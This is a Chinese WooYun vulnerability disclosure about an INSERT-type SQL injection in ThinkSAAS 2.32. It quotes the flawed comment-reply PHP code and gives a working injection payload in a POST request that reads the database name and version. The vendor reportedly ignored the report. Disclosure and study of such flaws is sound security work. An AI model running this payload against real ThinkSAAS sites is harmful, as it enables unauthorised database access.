当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110261

漏洞标题:ThinkSAAS SQL注入

相关厂商:thinksaas.cn

漏洞作者: Mr .LZH

提交时间:2015-05-04 11:32

修复时间:2015-08-07 11:35

公开时间:2015-08-07 11:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

ThinkSAAS SQL注入

详细说明:

版本 ThinkSAAS 2.32 目前最新版。
app\group\action\do.php 281行

//回复评论
case "recomment":

if($_POST['token'] != $_SESSION['token']) {
echo 1;exit;
}

$referid = intval($_POST['referid']);
$topicid = intval($_POST['topicid']);
$content = tsClean($_POST['content']);
$addtime = time();
$db->query("insert into ".dbprefix."group_topic_comment (`referid`,`topicid`,`userid`,`content`,`addtime`) values ('$referid','$topicid','$userid','$content','$addtime')");//---------------注入在这里
//统计评论数
$count_comment = $db->once_num_rows("select * from ".dbprefix."group_topic_comment where topicid='$topicid'");

//更新帖子最后回应时间和评论数
$uptime = time();

$db->query("update ".dbprefix."group_topic set uptime='$uptime',count_comment='$count_comment' where topicid='$topicid'");

$strTopic = $db->once_fetch_assoc("select * from ".dbprefix."group_topic where topicid='$topicid'");
$strComment = $db->once_fetch_assoc("select * from ".dbprefix."group_topic_comment where commentid='$referid'");

if($topicid && $strTopic['userid'] != $TS_USER['user']['userid']){
$msg_userid = '0';
$msg_touserid = $strTopic['userid'];
$msg_content = '你的帖子:《'.$strTopic['title'].'》新增一条评论,快去看看给个回复吧^_^ <br />'.tsUrl('group','topic',array('id'=>$topicid));
aac('message')->sendmsg($msg_userid,$msg_touserid,$msg_content);
}

if($referid && $strComment['userid'] != $TS_USER['user']['userid']){
$msg_userid = '0';
$msg_touserid = $strComment['userid'];
$msg_content = '有人评论了你在帖子:《'.$strTopic['title'].'》中的回复,快去看看给个回复吧^_^ <br />'.tsUrl('group','topic',array('id'=>$topicid));
aac('message')->sendmsg($msg_userid,$msg_touserid,$msg_content);
}

echo 0;exit;

break;


post变量全局做了转义,$content = tsClean($_POST['content']);这行去除了转义,导致可绕过单引号限制。
tsClean除去转义后做了一些过滤,但不影响注入。

function tsClean($text) {
$text = stripslashes(trim($text));//--------转义在这
//去除前后空格,并去除反斜杠
//$text = br2nl($text); //将br转换成/n


$_POST['content']变成$content并带入sql语句。
复现过程:
新建小组,发布帖子,访问http://127.0.0.1/thinksaas/index.php?app=group&ac=topic&id=1 (id为小组帖子的id)
接着发送如下请求:

http://127.0.0.1/thinksaas/index.php?app=group&ac=do&ts=recomment
post数据:token=5a64c8da0a7550eca1e841033f1cc294bcc60913&referid=1&topicid=1&content=\:',11),('22',1,'1',(select concat((DATABASE()),char(45),(VERSION()))),11),(1,1,3,'


最后会执行这样的sql语句。

insert into ts_group_topic_comment (`referid`,`topicid`,`userid`,`content`,`addtime`) values ('1','1','1','
&lt;p&gt;\:',11),('22',1,'1',(select concat((DATABASE()),char(45),(VERSION()))),11),(1,1,3,'&lt;/p&gt;
','1429281506')


因为是insert类型的注入,我通过写入3条数据来实现利用。

\:',11)用来闭合第一条记录,因为addtime是int型,无法写入string,难利用。


('22',1,'1',(select concat((DATABASE()),char(45),(VERSION()))),11)用来注入拿到数据。


(1,1,3,'用来闭合最后的内容,因为tsClean($_POST['content']);后前后会被加入回车和<p>,导致sql语句被分成3行,能控制的数据只在第二行,所以构造这个闭合成完整sql语句。


数据包中token可以在http://127.0.0.1/thinksaas/index.php?app=group&ac=topic&id=1获取到。准确点说,post数据应该是这样:

token=token值&referid=1&topicid=帖子id&content=\:',11),('22',帖子id
,'1',(select concat((DATABASE()),char(45),(VERSION()))),11),(1,帖子id,3,'


发送注入请求:

aaa.png


访问http://127.0.0.1/thinksaas/index.php?app=group&ac=topic&id=1查看注入结果,出现了3条数据。

bbb.png


漏洞证明:

很无奈,搜索引擎上面找到的站点都被上了waf,官网demo使用加速乐,所以只做了本地复现。谅解一下。

修复方案:

过滤

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-07 11:35

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无